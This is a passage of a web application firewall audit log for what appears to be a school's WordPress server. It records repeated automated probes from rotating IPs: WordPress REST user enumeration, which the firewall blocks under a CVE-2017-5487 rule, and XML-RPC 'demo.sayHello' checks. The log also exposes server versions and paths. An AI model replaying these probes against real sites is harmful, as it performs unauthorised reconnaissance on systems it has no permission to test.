Apache-HttpClient/4.5.13 (Java/11.0.26) --86f5602c-C-- demo.sayHello --86f5602c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86f5602c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836712350013 6110 (- - -) Stopwatch2: 1746836712350013 6110; combined=4423, p1=605, p2=3584, p3=32, p4=36, p5=98, sr=138, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86f5602c-Z-- --e0e93b38-A-- [10/May/2025:07:25:19 +0700] aB6c78i6w7GTj2w44Z6bBwAAANM 103.236.140.4 51476 103.236.140.4 8181 --e0e93b38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0e93b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0e93b38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836719027462 3482 (- - -) Stopwatch2: 1746836719027462 3482; combined=1553, p1=530, p2=985, p3=0, p4=0, p5=38, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0e93b38-Z-- --bd867e5a-A-- [10/May/2025:07:25:23 +0700] aB6c88i6w7GTj2w44Z6bCQAAANE 103.236.140.4 51480 103.236.140.4 8181 --bd867e5a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd867e5a-C-- demo.sayHello --bd867e5a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd867e5a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836723458939 6179 (- - -) Stopwatch2: 1746836723458939 6179; combined=4480, p1=659, p2=3615, p3=29, p4=31, p5=86, sr=182, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd867e5a-Z-- --1097ae48-A-- [10/May/2025:07:25:47 +0700] aB6dC8i6w7GTj2w44Z6bDAAAANc 103.236.140.4 51488 103.236.140.4 8181 --1097ae48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1097ae48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1097ae48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836747300449 3223 (- - -) Stopwatch2: 1746836747300449 3223; combined=1483, p1=506, p2=944, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1097ae48-Z-- --9730c27a-A-- [10/May/2025:07:25:51 +0700] aB6dD8i6w7GTj2w44Z6bDgAAAME 103.236.140.4 51492 103.236.140.4 8181 --9730c27a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9730c27a-C-- demo.sayHello --9730c27a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9730c27a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836751751000 5291 (- - -) Stopwatch2: 1746836751751000 5291; combined=4038, p1=459, p2=3352, p3=28, p4=30, p5=97, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9730c27a-Z-- --85df5c78-A-- [10/May/2025:07:26:25 +0700] aB6dMci6w7GTj2w44Z6bEgAAAMw 103.236.140.4 51502 103.236.140.4 8181 --85df5c78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85df5c78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85df5c78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836785241484 3202 (- - -) Stopwatch2: 1746836785241484 3202; combined=1371, p1=441, p2=901, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85df5c78-Z-- --fe51794c-A-- [10/May/2025:07:26:28 +0700] aB6dNNr9PbfRBMhzxmRZ8AAAAFA 103.236.140.4 51506 103.236.140.4 8181 --fe51794c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.73 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe51794c-C-- demo.sayHello --fe51794c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe51794c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836788363271 4826 (- - -) Stopwatch2: 1746836788363271 4826; combined=3668, p1=461, p2=2998, p3=25, p4=25, p5=92, sr=75, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe51794c-Z-- --ce323734-A-- [10/May/2025:07:26:39 +0700] aB6dP6uC4AqLGUOyzyX7PwAAAI0 103.236.140.4 51510 103.236.140.4 8181 --ce323734-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce323734-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce323734-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836799295520 2797 (- - -) Stopwatch2: 1746836799295520 2797; combined=1272, p1=421, p2=821, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce323734-Z-- --6b99ae50-A-- [10/May/2025:07:26:42 +0700] aB6dQsi6w7GTj2w44Z6bFAAAAMs 103.236.140.4 51514 103.236.140.4 8181 --6b99ae50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b99ae50-C-- demo.sayHello --6b99ae50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b99ae50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836802518122 6851 (- - -) Stopwatch2: 1746836802518122 6851; combined=4904, p1=616, p2=4035, p3=38, p4=45, p5=101, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b99ae50-Z-- --b9242b7f-A-- [10/May/2025:07:27:14 +0700] aB6dYsi6w7GTj2w44Z6bTgAAAMQ 103.236.140.4 51888 103.236.140.4 8181 --b9242b7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9242b7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9242b7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836834530719 2816 (- - -) Stopwatch2: 1746836834530719 2816; combined=1069, p1=365, p2=681, p3=0, p4=0, p5=23, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9242b7f-Z-- --44968330-A-- [10/May/2025:07:27:20 +0700] aB6daKuC4AqLGUOyzyX7fQAAAIo 103.236.140.4 51972 103.236.140.4 8181 --44968330-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44968330-C-- demo.sayHello --44968330-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44968330-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836840665494 3853 (- - -) Stopwatch2: 1746836840665494 3853; combined=2794, p1=407, p2=2232, p3=27, p4=25, p5=61, sr=50, sw=42, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44968330-Z-- --e415c879-A-- [10/May/2025:07:28:38 +0700] aB6dtsi6w7GTj2w44Z6b6QAAAMg 103.236.140.4 53040 103.236.140.4 8181 --e415c879-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e415c879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e415c879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836918709643 2792 (- - -) Stopwatch2: 1746836918709643 2792; combined=1265, p1=418, p2=818, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e415c879-Z-- --c3eefe7a-A-- [10/May/2025:07:28:39 +0700] aB6dtxLuBiaF9R054QBaWQAAABE 103.236.140.4 53052 103.236.140.4 8181 --c3eefe7a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c3eefe7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3eefe7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746836919497171 2813 (- - -) Stopwatch2: 1746836919497171 2813; combined=1228, p1=417, p2=781, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3eefe7a-Z-- --db45e513-A-- [10/May/2025:07:28:42 +0700] aB6duhLuBiaF9R054QBaaQAAABQ 103.236.140.4 53100 103.236.140.4 8181 --db45e513-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.104 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --db45e513-C-- demo.sayHello --db45e513-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --db45e513-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836922432161 4373 (- - -) Stopwatch2: 1746836922432161 4373; combined=3186, p1=473, p2=2447, p3=24, p4=25, p5=119, sr=52, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db45e513-Z-- --07990a4f-A-- [10/May/2025:07:28:43 +0700] aB6du8i6w7GTj2w44Z6b8QAAANc 103.236.140.4 53120 103.236.140.4 8181 --07990a4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.16 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07990a4f-C-- demo.sayHello --07990a4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07990a4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746836923818745 5950 (- - -) Stopwatch2: 1746836923818745 5950; combined=4279, p1=529, p2=3498, p3=32, p4=45, p5=102, sr=75, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07990a4f-Z-- --8b0cbf6e-A-- [10/May/2025:07:50:59 +0700] aB6i8xLuBiaF9R054QBapgAAAA0 103.236.140.4 53332 103.236.140.4 8181 --8b0cbf6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b0cbf6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0cbf6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746838259580428 2786 (- - -) Stopwatch2: 1746838259580428 2786; combined=1248, p1=430, p2=789, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0cbf6e-Z-- --b32e4148-A-- [10/May/2025:07:51:03 +0700] aB6i9xLuBiaF9R054QBaqAAAABM 103.236.140.4 53338 103.236.140.4 8181 --b32e4148-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b32e4148-C-- demo.sayHello --b32e4148-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b32e4148-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746838263690122 5718 (- - -) Stopwatch2: 1746838263690122 5718; combined=4180, p1=556, p2=3395, p3=33, p4=35, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b32e4148-Z-- --b7481373-A-- [10/May/2025:08:18:52 +0700] aB6pfBLuBiaF9R054QBaywAAAA4 103.236.140.4 53508 103.236.140.4 8181 --b7481373-B-- GET 